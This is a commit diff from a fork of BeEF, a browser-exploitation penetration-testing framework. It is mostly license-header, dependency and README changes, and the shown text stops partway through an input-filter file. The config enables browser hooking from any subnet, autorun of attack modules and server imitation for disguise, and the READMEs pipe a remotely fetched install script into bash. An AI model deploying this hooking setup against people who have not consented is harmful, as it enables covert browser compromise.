Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge branch 'master' of https://github.com/beefproject/beef

Browse Source
This commit is contained in:
Marc Wickenden
2013-11-24 00:16:36 +00:00
parent 612343990d db02b982bc
commit 91575adcb2
988 changed files with 26766 additions and 12240 deletions
Download Patch File Download Diff File Expand all files Collapse all files

7
.gitignore vendored
View File

@@ -1,3 +1,8 @@
beef.db
test/msf-test
custom-config.yaml
custom-config.yaml
.DS_Store
.gitignore
.rvmrc
*.lock

2
BeEFLive.sh Normal file
View File

@@ -0,0 +1,2 @@
# Reference for old (<1.2) versions of BeEF Live
bash /opt/beef/liveCD/BeEFLive.sh

30
Gemfile
View File

@@ -1,33 +1,26 @@
# BeEF's Gemfile
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# Gems only required on Windows, or with specific Windows issues
if RUBY_PLATFORM.downcase.include?("mswin") || RUBY_PLATFORM.downcase.include?("mingw")
gem "win32console"
gem "eventmachine", "1.0.0.beta.4.1"
else
gem "eventmachine", "0.12.10"
end
gem "eventmachine", "1.0.3"
gem "thin"
gem "sinatra", "1.3.2"
gem "sinatra", "1.4.2"
gem "rack", "1.5.2"
gem "em-websocket", "~> 0.3.6"
gem "jsmin", "~> 1.0.1"
gem "uglifier", "~> 2.2.1"
# install https://github.com/cowboyd/therubyracer if the OS is != than OSX
if !RUBY_PLATFORM.downcase.include?("darwin")
gem "therubyracer", "~> 0.12.0"
end
gem "ansi"
gem "term-ansicolor", :require => "term/ansicolor"
gem "dm-core"
@@ -38,6 +31,7 @@ gem "parseconfig"
gem "erubis"
gem "dm-migrations"
gem "msfrpc-client"
gem "rubyzip", "~> 1.0.0"
# notifications
gem "twitter"

16
INSTALL.txt
View File

@@ -1,18 +1,8 @@
===============================================================================
Copyright 2012 Wade Alcorn wade@bindshell.net
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
===============================================================================

158
README
View File

@@ -1,84 +1,74 @@
===============================================================================
Copyright 2012 Wade Alcorn wade@bindshell.net
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
===============================================================================
What is BeEF?
-------------
BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.
Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
Get Involved
------------
You can get in touch with the BeEF team. Just check out the following:
Please, send us pull requests!
Web: http://beefproject.com/
Mail: beef-subscribe@bindshell.net
IRC: ircs://irc.freenode.net/beefproject
Twitter: @beefproject
Requirements
------------
* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher
* [Ruby](http://rubylang.org) 1.9.2 RVM or higher
* [SQLite](http://sqlite.org) 3.x
* The following GEMS:
- bundler
- thin
- Sinatra
- ANSI
- TERM-ANSIcolor
- dm-core
- json
- data_objects
- dm-sqlite-adapter
- parseconfig
- erubis
- dm-migrations
- msfrpc-client
- eventmachine
- win32console (Windows Only)
Quick Start
-----------
__The following is for the impatient.__
For full installation details (including on Microsoft Windows), please refer to INSTALL.txt.
$ bash -s stable < <(curl -s https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef)
Usage
-----
To get started, simply execute beef and follow the instrustions:
$ ./beef
===============================================================================
Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
===============================================================================
What is BeEF?
-------------
BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.
Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
Get Involved
------------
You can get in touch with the BeEF team. Just check out the following:
Please, send us pull requests!
Web: http://beefproject.com/
Mail: beef-subscribe@bindshell.net
IRC: ircs://irc.freenode.net/beefproject
Twitter: @beefproject
Requirements
------------
* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher
* [Ruby](http://rubylang.org) 1.9.2 RVM or higher
* [SQLite](http://sqlite.org) 3.x
* The following GEMS:
- bundler
- thin
- Sinatra
- ANSI
- TERM-ANSIcolor
- dm-core
- json
- data_objects
- dm-sqlite-adapter
- parseconfig
- erubis
- dm-migrations
- msfrpc-client
- eventmachine
- win32console (Windows Only)
Quick Start
-----------
__The following is for the impatient.__
For full installation details (including on Microsoft Windows), please refer to INSTALL.txt.
$ bash -s stable < <(curl -s https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef)
Usage
-----
To get started, simply execute beef and follow the instrustions:
$ ./beef

161
README.mkd
View File

@@ -1,84 +1,77 @@
===============================================================================
Copyright 2012 Wade Alcorn wade@bindshell.net
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
===============================================================================
What is BeEF?
-------------
__BeEF__ is short for __The Browser Exploitation Framework__. It is a penetration testing tool that focuses on the web browser.
Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
Get Involved
------------
You can get in touch with the BeEF team. Just check out the following:
__Please, send us pull requests!__
__Web:__ http://beefproject.com/
__Mail:__ beef-subscribe@bindshell.net
__IRC:__ ircs://irc.freenode.net/beefproject
__Twitter:__ @beefproject
Requirements
------------
* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher
* [Ruby](http://rubylang.org) 1.9.2 RVM or higher
* [SQLite](http://sqlite.org) 3.x
* The following GEMS:
- bundler
- thin
- Sinatra
- ANSI
- TERM-ANSIcolor
- dm-core
- json
- data_objects
- dm-sqlite-adapter
- parseconfig
- erubis
- dm-migrations
- msfrpc-client
- eventmachine
- win32console (Windows Only)
Quick Start
-----------
__The following is for the impatient.__
For full installation details (including on Microsoft Windows), please refer to INSTALL.txt.
$ curl https://raw.github.com/beefproject/beef/a6a7536e/install-beef | bash -s stable
Usage
-----
To get started, simply execute beef and follow the instructions:
$ ./beef
===============================================================================
Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
===============================================================================
What is BeEF?
-------------
__BeEF__ is short for __The Browser Exploitation Framework__. It is a penetration testing tool that focuses on the web browser.
Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
Get Involved
------------
You can get in touch with the BeEF team. Just check out the following:
__Please, send us pull requests!__
__Web:__ http://beefproject.com/
__Mail:__ beef-subscribe@bindshell.net
__IRC:__ ircs://irc.freenode.net/beefproject
__Twitter:__ @beefproject
Requirements
------------
* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher
* [Ruby](http://rubylang.org) 1.9.2 RVM or higher
* [SQLite](http://sqlite.org) 3.x
* The following GEMS:
- bundler
- thin
- Sinatra
- ANSI
- TERM-ANSIcolor
- dm-core
- json
- data_objects
- dm-sqlite-adapter
- parseconfig
- erubis
- dm-migrations
- msfrpc-client
- eventmachine
- win32console (Windows Only)
Quick Start
-----------
__The following is for the impatient.__
For full installation details (including on Microsoft Windows), please refer to INSTALL.txt.
$ curl https://raw.github.com/beefproject/beef/a6a7536e/install-beef | bash -s stable
Usage
-----
To get started, simply execute beef and follow the instructions:
$ ./beef
On windows use
$ ruby beef

22
Rakefile
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
task :default => ["quick"]
@@ -86,10 +76,10 @@ end
@beef_process_id = nil;
task :beef_start => 'beef' do
printf "Starting BeEF (wait 10 seconds)..."
printf "Starting BeEF (wait a few seconds)..."
@beef_process_id = IO.popen("ruby ./beef -x 2> /dev/null", "w+")
delays = [2, 2, 1, 1, 1, 0.5, 0.5 , 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05]
delays.each do |i| # delay for 10 seconds
delays = [3, 2, 2, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
delays.each do |i| # delay for a few seconds
printf '.'
sleep (i)
end

18
VERSION
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
0.4.3.7-alpha
0.4.4.9-alpha

17
beef
View File

@@ -1,19 +1,9 @@
#!/usr/bin/env ruby
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# stop deprecation warning from being displayed
@@ -85,6 +75,7 @@ case config.get("beef.database.driver")
DataMapper.setup(:default,
:adapter => config.get("beef.database.driver"),
:host => config.get("beef.database.db_host"),
:port => config.get("beef.database.db_port"),
:username => config.get("beef.database.db_user"),
:password => config.get("beef.database.db_passwd"),
:database => config.get("beef.database.db_name"),

84
config.yaml
View File

@@ -1,62 +1,64 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# BeEF Configuration file
beef:
version: '0.4.3.7-alpha'
version: '0.4.4.9-alpha'
debug: false
restrictions:
# subnet of browser ip addresses that can hook to the framework
# subnet of browser ip addresses that can hook to the framework
permitted_hooking_subnet: "0.0.0.0/0"
# subnet of browser ip addresses that can connect to the UI
# subnet of browser ip addresses that can connect to the UI
# permitted_ui_subnet: "127.0.0.1/32"
permitted_ui_subnet: "0.0.0.0/0"
http:
debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
host: "0.0.0.0"
port: "3000"
# Decrease this setting up to 1000 if you want more responsiveness when sending modules and retrieving results.
# It's not advised to decrease it with tons of hooked browsers (more than 50),
# because it might impact performance. Also, enable WebSockets is generally better.
xhr_poll_timeout: 5000
# if running behind a nat set the public ip address here
#public: ""
#public_port: "" # port setting is experimental
dns: "localhost"
panel_path: "/ui/panel"
# DNS
dns_host: "localhost"
dns_port: 53
web_ui_basepath: "/ui"
hook_file: "/hook.js"
hook_session_name: "BEEFHOOK"
session_cookie_name: "BEEFSESSION"
# Allow one or multiple domains to access the RESTful API using CORS
# For multiple domains use: "http://browserhacker.com, http://domain2.com"
restful_api:
allow_cors: false
cors_allowed_domains: "http://browserhacker.com"
# Prefer WebSockets over XHR-polling when possible.
websocket:
enable: false
secure: true # use WebSocketSecure work only on https domain and whit https support enabled in BeEF
secure: true # use 'WebSocketSecure' works only on HTTPS domains and with HTTPS support enabled in BeEF
port: 61985 # WS: good success rate through proxies
secure_port: 61986 # WSS
alive_timer: 1000 # poll BeEF every second
secure_port: 61986 # WSSecure
ws_poll_timeout: 1000 # poll BeEF every second
# Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
web_server_imitation:
enable: false
enable: true
type: "apache" #supported: apache, iis
# Experimental HTTPS support for the hook / admin / all other Thin managed web services
https:
enable: false
# In production environments, be sure to use a valid certificate signed for the value
# used in beef.http.dns (the domain name of the server where you run BeEF)
# used in beef.http.dns_host (the domain name of the server where you run BeEF)
key: "beef_key.pem"
cert: "beef_cert.pem"
@@ -65,13 +67,20 @@ beef:
# README.databases file
# supported DBs: sqlite, mysql, postgres
# NOTE: you must change the Gemfile adding a gem require line like:
# gem "dm-postgres-adapter"
# or
# gem "dm-mysql-adapter"
# if you want to switch drivers from sqlite to postgres (or mysql).
# Finally, run a 'bundle install' command and start BeEF.
driver: "sqlite"
# db_file is only used for sqlite
db_file: "beef.db"
# db connection information is only used for mysql/postgres
db_host: "localhost"
db_port: 5432
db_name: "beef"
db_user: "beef"
db_passwd: "beef123"
@@ -82,18 +91,33 @@ beef:
user: "beef"
passwd: "beef"
# Autorun modules as soon the browser is hooked.
# NOTE: only modules with target type 'working' or 'user_notify' can be run automatically.
autorun:
enable: true
# set this to FALSE if you don't want to allow auto-run execution for modules with target->user_notify
allow_user_notify: true
crypto_default_value_length: 80
# Enable client-side debugging
client:
debug: false
# You may override default extension configuration parameters here
extension:
requester:
enable: true
enable: true
proxy:
enable: true
enable: true
metasploit:
enable: false
console:
shell:
enable: false
social_engineering:
enable: true
evasion:
enable: false
console:
shell:
enable: false
ipec:
enable: true

16
core/api.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF

16
core/api/extension.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF

16
core/api/extensions.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module API

16
core/api/main/configuration.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module API

16
core/api/main/migration.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module API

16
core/api/main/network_stack/assethandler.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module API

16
core/api/main/server.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module API

16
core/api/main/server/hook.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module API

16
core/api/module.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module API

16
core/api/modules.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module API

20
core/bootstrap.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
@@ -34,6 +24,8 @@ require 'core/main/handlers/browserdetails'
# @note Include the network stack
require 'core/main/network_stack/handlers/dynamicreconstruction'
require 'core/main/network_stack/handlers/redirector'
require 'core/main/network_stack/handlers/raw'
require 'core/main/network_stack/assethandler'
require 'core/main/network_stack/api'
@@ -50,8 +42,10 @@ require 'core/hbmanager'
## @note Include RESTful API
require 'core/main/rest/handlers/hookedbrowsers'
require 'core/main/rest/handlers/modules'
require 'core/main/rest/handlers/categories'
require 'core/main/rest/handlers/logs'
require 'core/main/rest/handlers/admin'
require 'core/main/rest/handlers/server'
require 'core/main/rest/api'
## @note Include Websocket

19
core/core.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
@@ -47,4 +37,7 @@ require 'core/main/migration'
require 'core/main/console/commandline'
require 'core/main/console/banners'
# @note Include rubyzip lib
require 'zip'

16
core/extension.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Extension

16
core/extensions.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Extensions

16
core/filters.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Filters

16
core/filters/base.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Filters

22
core/filters/browser.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Filters
@@ -32,7 +22,7 @@ module Filters
def self.is_valid_browsertype?(str)
return false if not is_non_empty_string?(str)
return false if str.length < 10
return false if str.length > 50
return false if str.length > 250
return false if has_non_printable_char?(str)
true
end
@@ -133,9 +123,9 @@ module Filters
return true if not is_non_empty_string?(str)
return false if str.length > 1000
if RUBY_VERSION >= "1.9" && str.encoding === Encoding.find('UTF-8')
return (str =~ /[^\w\d\s()-.,;_!\302\256]/u).nil?
return (str =~ /[^\w\d\s()-.,';_!\302\256]/u).nil?
else
return (str =~ /[^\w\d\s()-.,;_!\302\256]/n).nil?
